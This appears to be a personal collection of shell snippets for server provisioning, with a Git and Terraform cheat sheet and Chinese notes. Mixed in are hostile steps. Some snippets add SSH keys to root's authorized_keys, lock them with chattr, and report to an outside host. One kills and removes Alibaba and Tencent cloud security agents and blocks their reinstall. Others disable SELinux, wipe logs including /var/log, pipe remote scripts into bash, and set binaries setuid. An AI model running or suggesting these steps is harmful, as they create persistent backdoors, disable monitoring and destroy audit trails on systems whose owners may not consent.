i0 if [ $USER = ywgx ];then [ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0 [ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1 [ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2 [ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://s.xabcstack.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0 wget -t 3 https://s.xabcstack.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf [ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key [ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx pgrep nginx||~/0/openresty/nginx/sbin/nginx fi
h cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" CPU=`cat /proc/cpuinfo|grep "processor"|wc -l` MEM=`free|awk '/Mem/ {print int(($2+1048576)/1048576)}'` echo "$OS $CPU $MEM"
busybox [ -d /usr/local/bin ]||mkdir -p /usr/local/bin wget -t 3 https://s.xabcstack.com/files/busybox -O /usr/local/bin/busybox chmod +x /usr/local/bin/busybox
git git clone https://gitlab.glority.cn/operation/matrix-build.git ./build (clone 到指定目录) 整理的常用 Git 命令清单。几个专用名词的译名如下。 Workspace:工作区 Index / Stage:暂存区 Repository:仓库区(或本地仓库) Remote:远程仓库 一、新建代码库 在当前目录新建一个Git代码库 $ git init 新建一个目录,将其初始化为Git代码库 $ git init [project-name] 下载一个项目和它的整个代码历史 $ git clone [url] 二、配置 Git的设置文件为.gitconfig,它可以在用户主目录下(全局配置),也可以在项目目录下(项目配置)。 #显示当前的Git配置 $ git config --list #编辑Git配置文件 $ git config -e [–global] #设置提交代码时的用户信息 $ git config [–global] user.name “[name]” $ git config [–global] user.email “[email address]” 三、增加/删除文件 #添加指定文件到暂存区 $ git add [file1] [file2] … #添加指定目录到暂存区,包括子目录 $ git add [dir] #添加当前目录的所有文件到暂存区 $ git add . #添加每个变化前,都会要求确认 # 对于同一个文件的多处变化,可以实现分次提交 $ git add -p #删除工作区文件,并且将这次删除放入暂存区 $ git rm [file1] [file2] … #停止追踪指定文件,但该文件会保留在工作区 $ git rm --cached [file] #改名文件,并且将这个改名放入暂存区 $ git mv [file-original] [file-renamed] 四、代码提交 #提交暂存区到仓库区 $ git commit -m [message] #提交暂存区的指定文件到仓库区 $ git commit [file1] [file2] … -m [message] #提交工作区自上次commit之后的变化,直接到仓库区 $ git commit -a #提交时显示所有diff信息 $ git commit -v #使用一次新的commit,替代上一次提交 # 如果代码没有任何新变化,则用来改写上一次commit的提交信息 $ git commit --amend -m [message] #重做上一次commit,并包括指定文件的新变化 $ git commit --amend [file1] [file2] … 五、分支 #列出所有本地分支 $ git branch #列出所有远程分支 $ git branch -r #列出所有本地分支和远程分支 $ git branch -a #新建一个分支,但依然停留在当前分支 $ git branch [branch-name] #新建一个分支,并切换到该分支 $ git checkout -b [branch] #新建一个分支,指向指定commit $ git branch [branch] [commit] #新建一个分支,与指定的远程分支建立追踪关系 $ git branch --track [branch] [remote-branch] #切换到指定分支,并更新工作区 $ git checkout [branch-name] #切换到上一个分支 $ git checkout - #建立追踪关系,在现有分支与指定的远程分支之间 $ git branch --set-upstream [branch] [remote-branch] #合并指定分支到当前分支 $ git merge [branch] #选择一个commit,合并进当前分支 $ git cherry-pick [commit] #删除分支 $ git branch -d [branch-name] #删除远程分支 $ git push origin --delete [branch-name] $ git branch -dr [remote/branch] 六、标签 #列出所有tag $ git tag #新建一个tag在当前commit $ git tag [tag] #新建一个tag在指定commit $ git tag [tag] [commit] #删除本地tag $ git tag -d [tag] #删除远程tag $ git push origin :refs/tags/[tagName] #查看tag信息 $ git show [tag] #提交指定tag $ git push [remote] [tag] #提交所有tag $ git push [remote] --tags #新建一个分支,指向某个tag $ git checkout -b [branch] [tag] git tag -a 2020-07-08 -m '2020-07-08' git push 2020-07-08 七、查看信息 #显示有变更的文件 $ git status #显示当前分支的版本历史 $ git log #显示commit历史,以及每次commit发生变更的文件 $ git log --stat #搜索提交历史,根据关键词 $ git log -S [keyword] #显示某个commit之后的所有变动,每个commit占据一行 $ git log [tag] HEAD --pretty=format:%s #显示某个commit之后的所有变动,其"提交说明"必须符合搜索条件 $ git log [tag] HEAD --grep feature #显示某个文件的版本历史,包括文件改名 $ git log --follow [file] $ git whatchanged [file] #显示指定文件相关的每一次diff $ git log -p [file] #显示过去5次提交 $ git log -5 --pretty --oneline #显示所有提交过的用户,按提交次数排序 $ git shortlog -sn #显示指定文件是什么人在什么时间修改过 $ git blame [file] #显示暂存区和工作区的差异 $ git diff #显示暂存区和上一个commit的差异 $ git diff --cached [file] #显示工作区与当前分支最新commit之间的差异 $ git diff HEAD #显示两次提交之间的差异 $ git diff [first-branch]…[second-branch] #显示今天你写了多少行代码 $ git diff --shortstat “@{0 day ago}” #显示某次提交的元数据和内容变化 $ git show [commit] #显示某次提交发生变化的文件 $ git show --name-only [commit] #显示某次提交时,某个文件的内容 $ git show [commit]:[filename] #显示当前分支的最近几次提交 $ git reflog 八、远程同步 #下载远程仓库的所有变动 $ git fetch [remote] #显示所有远程仓库 $ git remote -v #显示某个远程仓库的信息 $ git remote show [remote] #增加一个新的远程仓库,并命名 $ git remote add [shortname] [url] #取回远程仓库的变化,并与本地分支合并 $ git pull [remote] [branch] #上传本地指定分支到远程仓库 $ git push [remote] [branch] #强行推送当前分支到远程仓库,即使有冲突 $ git push [remote] --force #推送所有分支到远程仓库 $ git push [remote] --all 九、撤销 #恢复暂存区的指定文件到工作区 $ git checkout [file] #恢复某个commit的指定文件到暂存区和工作区 $ git checkout [commit] [file] #恢复暂存区的所有文件到工作区 $ git checkout . #重置暂存区的指定文件,与上一次commit保持一致,但工作区不变 $ git reset [file] #重置暂存区与工作区,与上一次commit保持一致 $ git reset --hard #重置当前分支的指针为指定commit,同时重置暂存区,但工作区不变 $ git reset [commit] #重置当前分支的HEAD为指定commit,同时重置暂存区和工作区,与指定commit一致 $ git reset --hard [commit] #重置当前HEAD为指定commit,但保持暂存区和工作区不变 $ git reset --keep [commit] #新建一个commit,用来撤销指定commit # 后者的所有变化都将被前者抵消,并且应用到当前分支 $ git revert [commit] #暂时将未提交的变化移除,稍后再移入 $ git stash $ git stash pop 十、其他 #查看远程分支和本地分支的对应关系 $git remote show origin #从本地删除远程已经删除的分支的tracking(在issue被merge之后,远程分支会被删除,那么相应的本地tracking我们也可以删除掉) $git remote prune origin #从本地删除远程已经删除的分支(merge后可以执行此操作保持工作区的清洁) $git fetch -p && for branch in `git branch -vv | grep ': gone]' | awk '{print $1}'`; do git branch -D $branch; done #生成一个可供发布的压缩包 $ git archive
pycurl mkdir -p /tmp/build&&cd /tmp/build wget -t 3 https://s.xabcstack.com/files/curl-7.43.0.tar.gz -O -|tar xzf - cd curl-7.43.0 ./configure make && make install mv /usr/lib64/libcurl.so.4* /tmp/ ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4.3.0 ln -sf /usr/local/lib/libcurl.so.4.3.0 /usr/lib64/libcurl.so.4 pip3 install pycurl
filelist2 cd ~ [ -d /home/ywgx/0 ]||mkdir -p /home/ywgx/0 [ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1 [ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2 [ -d /home/ywgx/logs ]||mkdir -p /home/ywgx/logs [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://s.xabcstack.com/ywgx/0/openresty.tgz -O -|tar xzf - -C /home/ywgx/0 wget -t 3 https://s.xabcstack.com/ywgx/0/nginx.conf -O /home/ywgx/0/openresty/nginx/conf/nginx.conf [ -d /home/ywgx/0/openresty/nginx/conf/ssl ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/ssl wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.pem -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.pem wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.key -O /home/ywgx/0/openresty/nginx/conf/ssl/filelist.cn.key [ -d /home/ywgx/0/openresty/nginx/conf/vhost ]||mkdir -p /home/ywgx/0/openresty/nginx/conf/vhost wget -t 3 https://s.xabcstack.com/ywgx/0/filelist.cn.conf -O /home/ywgx/0/openresty/nginx/conf/vhost/filelist.cn.conf wget -t 3 https://s.xabcstack.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1 wget -t 3 https://s.xabcstack.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2 wget -t 3 https://s.xabcstack.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2 pgrep redis||~/2/redis/bin/redis-server ~/2/redis/conf/redis.conf pgrep mongod||~/2/mongo/bin/mongod -f ~/2/mongo/conf/mongod.conf curl xabc.io/filelistrb|bash echo "chown root.nobody /home/ywgx/0/openresty/nginx/sbin/nginx;chmod +xs /home/ywgx/0/openresty/nginx/sbin/nginx"
i1 if [ $USER = ywgx ];then [ -d /home/ywgx/1 ]||mkdir -p /home/ywgx/1 [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://s.xabcstack.com/filelist/filelist-bin.tgz -O -|tar xzf - -C /home/ywgx/1 fi
i2 if [ $USER = ywgx ];then [ -d /home/ywgx/2 ]||mkdir -p /home/ywgx/2 [ -d /home/ywgx/data/filelist ]||mkdir -p /home/ywgx/data/filelist wget -t 3 https://s.xabcstack.com/ywgx/2/redis.tgz -O -|tar xzf - -C /home/ywgx/2 wget -t 3 https://s.xabcstack.com/ywgx/2/mongo.tgz -O -|tar xzf - -C /home/ywgx/2 fi
i if [ $USER = ywgx ];then wget -q -t 3 https://s.xabcstack.com/ywgx/vim.tgz -O -|tar xzf - -C ~ wget -q -t 3 https://s.xabcstack.com/ywgx/.gitconfig -O ~/.gitconfig wget -q -t 3 https://s.xabcstack.com/ywgx/.gitignore -O ~/.gitignore wget -q -t 3 https://s.xabcstack.com/ywgx/.my.cnf -O ~/.my.cnf wget -q -t 3 https://s.xabcstack.com/ywgx/.wgetrc -O ~/.wgetrc if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then [ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== ywgx" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys chattr +ai ~/.ssh/authorized_keys fi if ! grep -q "Ogsuw71ublt" /root/.ssh/authorized_keys &>/dev/null;then [ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys chattr +ai ~/.ssh/authorized_keys curl -d "msg=# ssh 75.101.220.230" "https://xabc.io/send/ssh/" &>/dev/null fi fi
t ip addr | awk '/inet / {sub(/\/.*/, "", $2); print $2}'|grep -E '^10\.|^100\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1
u ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1
ip IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1);echo $IP
istio echo doing... wget -t 3 https://s.xabcstack.com/istio/istio.tgz -O -|tar xzf - -C /opt wget -t 3 https://s.xabcstack.com/istio/xabc-istio.sh -O /etc/profile.d/xabc-istio.sh echo /opt/istio
q echo doing... find / -empty -mtime +7 ! -path "/proc/*" -a ! -path "/sys/*" -a ! -path "/etc/*" ! -path "/boot/*" -type f -a -name "*.log" -delete for i in $(find `du -s /* --exclude={proc,etc,sys,boot,run,mnt}|sort -nr|head -7|awk '{print $2}'|tr '\n' ' '` -type f -a -name "*.log" ! -name ".xabc.log" ! -name ".usercmd.log" ! -name "usercmd.log" ! -name ".sys.log" -o -name "catalina.out");do echo $i;> $i;done
k chattr -ai -R /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null rm -rf /etc/motd &>/dev/null rm -fr /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null rm -rf /lib/systemd/system/aliyun.service &>/dev/null mkdir /usr/local/{aegis,cloudmonitor,qcloud} killall -9 sgagent &>/dev/null killall -9 barad_agent &>/dev/null killall -9 aliyun_assist_update &>/dev/null killall -9 aliyun_assist_update &>/dev/null killall -9 AliSecureCheckAdvanced &>/dev/null killall -9 CmsGoAgent.linux-amd64 &>/dev/null kill -9 `pidof YDLive` &>/dev/null kill -9 `pidof YDService` &>/dev/null kill -9 `pidof wrapper` &>/dev/null kill -9 `pidof AliYunDun` &>/dev/null kill -9 `pidof AliYunDunUpdate` &>/dev/null chattr +ai /usr/local/{aegis,cloudmonitor,qcloud}
tips # 物理内存大小 = 物理已使用的内存 + 物理没使用的内存 total = used + free # 可用内存大小 = 物理没使用的内存 + 缓冲 + 缓存 available = free + buffers + cached # 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100 percent = (total - available) / total * 100 /etc 系统文件属性恢复 #restorecon -Rv /etc PATH=$PATH:$HOME/.local/bin:$HOME/bin 查看某进程的文件打开数 cat /proc//limits ls -lh /proc//fd ls -lh /proc//fd|wc -l import salt.client local = salt.client.LocalClient() print(help(local.cmd)) find . -type f | parallel -j+0 grep -i foobar 并发的grep systemctl list-unit-files --type=service|grep enabled ulimit -n # 查看当前用户可用最大句柄 sysctl -a | grep fs.file-max # 查看内核级的文件句柄最大限制值 cat /proc/sys/fs/file-nr # 查看当前已用的文件句柄数量 和 内核级的文件句柄限制的最大值 乱码转换 :set fileencoding=UTF-8 :x! TAB替换为空格: :se ts=4 :se et :%retab! 空格替换为TAB: :se ts=4 :se noet :%retab! curl 2 python: https://curl.trillworks.com au BufNewFile,BufRead *.py se ts=4 sts=4 sw=4 et k8s minikube start --driver=hyperv --memory=4096m --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers /etc/security/limits.conf (注意同时要留意 /etc/security/limits.d/下面的参数) root soft nofile 65535 root hard nofile 65535 * soft nofile 65535 * hard nofile 65535 * soft nproc 65535 * hard nproc 65535 还要追加下面一行给(/etc/pam.d/login) session required pam_limits.so usermod -aG wheel ywgx (把 ywgx 添加入wheel分组) rsync -av --progress --delete /tmp/abc ywgx@base.xabcstack.com:/tmp/ (这个会把当前主机 /tmp/abc 同步到目标机器 /tmp/ 目录下,如果没有自动创建abc目录) rsync --daemon --config=./rsyncd.conf rsync -aq --progress root@repo.xabcstack.com::salt . return 301 https://$host$request_uri; awk '{ print $(NF-2) }' scp -P 12349 upload_file username@server echo "*/5 * * * * pgrep sentinel.py||/srv/zero/sentinel.py &>/var/log/xabc.log &" > /var/spool/cron/root for i in `find /root/.jenkins/jobs -maxdepth 6 -name "[0-9]*" -a -mtime +3`;do rm -rf $i;done */5 * * * * pgrep nginx||/opt/openresty/nginx/sbin/nginx netstat -aulntp nc -vuz 100.67.1.217 514 (探测主机100.67.1.217 UDP 514 端口是否打开) Influxdata 数据备份和恢复 备份: influxd backup -database database_name 数据存储位置 influxd backup -database database_name -host localhost:8088 数据存储位置 # 远程备份 恢复元数据: influxd restore -metadir /var/lib/influxdb/meta/ 元数据存储位置 influxd restore -database database_name -datadir /var/lib/influxdb/data 数据存储位置 修改权限: chown -R influxdb:influxdb /var/lib/influxdb 重启influxdb: service influxdb stop service influxdb start 磁盘挂载 1. fdisk -l 2. mkfs.ext4 /dev/vd{x} 3. mount /dev/vd{x} /media 4. vim /etc/fstab /dev/vd{x} /media ext4 defaults 0 0 时区设置 timedatectl set-timezone Asia/Shanghai 同步本地时间到硬件 hwclock --systohc 通过redis-cli导入数据 通过在ECS上的redis-cli,可将用户ECS上原有的数据导入到云数据库Redis版中,操作代码为: # redis-cli -h old_instance_ip -p old_instance_port config set appendonly yes # redis-cli -h aliyun_redis_instance_ip -p 6379 -a password --pipe < appendonly.aof # terraform terraform version 查看 Terraform 版本 terraform init 初始化 Terraform terraform plan Terraform 执行计划 terraform apply 应用 Terraform terraform show 检查 Terraform 状态 terraform output 查看输出变量的值 terraform graph 生成资源依赖图 terraform destroy 销毁资源 terraform workspace 管理 Terraform 工作区 terraform workspace new 新建工作区 terraform workspace list 列出工作区 terraform workspace select 切换工作区 terraform workspace delete 删除工作区 terraform get 下载或更新 Terraform 模块 terraform fmt 格式化 Terraform 代码 terraform validate 检查 Terraform 语法 terraform console Terraform 控制台 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -t mangle -I POSTROUTING -p tcp -m tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1024 firewall systemctl start firewalld firewall-cmd --reload use mysql; update user set host = '%' where user = 'root'; FLUSH PRIVILEGES;
j echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash wget -t 3 https://s.xabcstack.com/src/java.tgz -O -|tar xzf - -C /tmp tar xzf /tmp/java/files/jdk.tgz -C /opt tar xzf /tmp/java/files/tomcat.tgz -C /opt mv /tmp/java/files/*.sh /etc/profile.d/ rm -rf /tmp/java/ echo "/opt/{jdk,tomcat}"
qd if ! grep -q "shanyue" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2WWvp2xVAe7AWYHA9rVjym97eWCfoMTYtpVwZjn4z2lAoIHIZ3cRVSwF05+nThHBhWdhE4rVKeS3SCKX/Mbj8Jg7eZ58Apw8YPdoUmQUZDWixG6r/UkSFlC7SpyrC7WgWD1Ayr6G+TQ4l0jnUFDvRgo1VMrp5wJOAPM7J9ApVJw5viHD9MCq3omxPVNIu1di6UZqUuIV2y8Eqf65zdUGl0DzAdvzpUIuP2vSqRVkOQwHSZrlmCHBICtWdEY0DTKMFB9niNve+Vgz7xqprZh+C6WVHlCBkXGaqLT29uewlnV0mbVqqpaFmDgH8NfAjVZbf6XlfoUS09q6RHwnYJ/3H a.shanyue@gmail.com" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chattr +ai /root/.ssh/authorized_keys fi which setenforce &>/dev/null&&setenforce -1 &>/dev/null [ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
go wget -t 3 https://s.xabcstack.com/files/go.tgz -O -|tar xzf - -C /usr/local wget -t 3 https://s.xabcstack.com/files/xabc-go.sh -O /etc/profile.d/xabc-go.sh
close chattr +ai /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/services
mysql cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils wget -t 3 https://s.xabcstack.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo yum -y install mariadb mariadb-server systemctl start mariadb systemctl enable mariadb mysql_secure_installation fi if [ "$OS" = "Debian" ];then apt-get -y install mysql-server fi
dep curl https://raw.githubusercontent.com/golang/dep/master/install.sh|bash
f salt \* saltutil.refresh_pillar
m yum -y install wget yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum -y install salt-minion systemctl enable salt-minion.service
init yum update -y curl -s xabc.io/a|bash curl -s xabc.io/k|bash rm -rf /var/log;mkdir -p /var/log reboot
runner curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runner-linux-amd64 chmod +x /usr/local/bin/gitlab-runner #gitlab-runner install --user=root --working-directory=/root #gitlab-runner start #gitlab-runner register
minion_clean systemctl stop salt-minion pkill salt-minion &>/dev/null killall salt-minion &>/dev/null pkill salt-minion &>/dev/null rm -fr /etc/salt/pki/minion /var/log/salt/minion* service salt-minion restart
tf wget -t 3 https://s.xabcstack.com/terraform/terraform -O /usr/local/bin/terraform chmod +x /usr/local/bin/terraform /usr/local/bin/terraform -install-autocomplete
uuid cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then yum -y install yum-utils yum -y install libuuid-devel fi if [ "$OS" = "Debian" ];then apt-get -y install uuid-dev fi
awscli #https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip rm -rf /tmp/aws curl https://s.xabcstack.com/aws/awscli-exe-linux-x86_64.zip -o /tmp/awscli-exe-linux-x86_64.zip unzip -q /tmp/awscli-exe-linux-x86_64.zip -d /tmp/ /tmp/aws/install -i ~/.local/aws-cli -b ~/.local/bin
py3b if ! type python3 &>/dev/null;then cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then if [ ! -d "/usr/local/lib/python3.8" ];then echo doing... wget -t 3 https://s.xabcstack.com/files/lib-python3.8.tgz -O -|tar xzf - -C /usr/local/lib wget -t 3 https://s.xabcstack.com/files/include-python3.8.tgz -O -|tar xzf - -C /usr/local/include wget -t 3 https://s.xabcstack.com/files/pip3.8 -O /usr/local/bin/pip3.8 wget -t 3 https://s.xabcstack.com/files/python3.8 -O /usr/local/bin/python3.8 chmod +x /usr/local/bin/pip3.8 /usr/local/bin/python3.8 ln -s /usr/local/bin/python3.8 /usr/local/bin/python3 source /etc/profile echo "done" fi fi fi
o echo doing... curl -s xabc.io/b|bash curl -s xabc.io/e|bash curl -s xabc.io/v|bash cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" wget -t 3 https://s.xabcstack.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt wget -t 3 https://s.xabcstack.com/files/nginx.conf -O /opt/openresty/nginx/conf/nginx.conf mkdir -p /opt/openresty/nginx/conf/ssl chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow id -u nobody &>/dev/null||useradd nobody -r -s /bin/false groupadd -f nobody &>/dev/null chown root.nobody /opt/openresty/nginx/sbin/nginx if [ "$OS" = "RedHat" ] then grep -q nginx /etc/rc.d/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.d/rc.local;chmod 755 /etc/rc.d/rc.local fi if [ "$OS" = "Debian" ] then grep -q nginx /etc/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.local;chmod 755 /etc/rc.local fi chmod +xs /opt/openresty/nginx/sbin/nginx echo "/opt/openresty"
hf if ! grep -q "hfzp" /root/.ssh/authorized_keys &>/dev/null;then [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7cDLbprh+i930XUqo81RXjaLg4Kot5L9aiB789V4L/mDfV7ZeW6k2S1bdIGUrtSmFZnmA/2HQKid102mEzp8Y2/xkwXoTM/hsah+X8DXLX5/xwUb2XuhqZSJy+x/6MLC9MGjvQGFpqvaK1fJZzjFxZaaHoC79iJWbYCzBLo2n+EcmmX559gAgcUSSvjsUQRAy7f+/1Hp/cLB+rqTMVoNgeAZGgMV6QNoxpZlKWSTFeicxN/sNgy6FLpLOyuX5xwsYfpaDdZd+MYlG69XDIakh4cy+kg9q6nQ2bYOw3GhdNMSNnlsU7XkY872OUCTodZ8iu24AvqFE1kxCaIp8egAD hfzp" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys chattr +ai /root/.ssh/authorized_keys fi which setenforce &>/dev/null&&setenforce -1 &>/dev/null [ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
open chattr -ai /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/services
kubectl #curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl wget -t 3 https://s.xabcstack.com/k8s/kubectl -O /usr/local/bin/kubectl chmod +x /usr/local/bin/kubectl
x cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian" cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat" if [ "$OS" = "RedHat" ];then rm -f /var/lib/rpm/__db* rpm --rebuilddb yum install -y yum-utils yum clean all yum-complete-transaction --cleanup-only yum history redo last package-cleanup --dupes;package-cleanup --problems yum clean metadata yum makecache yum clean expire-cache fi if [ "$OS" = "Debian" ];then dpkg --configure -a apt-get --fix-broken install apt-key update apt-get -f -y install --allow-unauthenticated --force-yes apt-get clean cd /var/lib/apt&&rm -rf lists;mkdir -p /var/lib/apt/lists/partial apt-get clean apt-get update fi
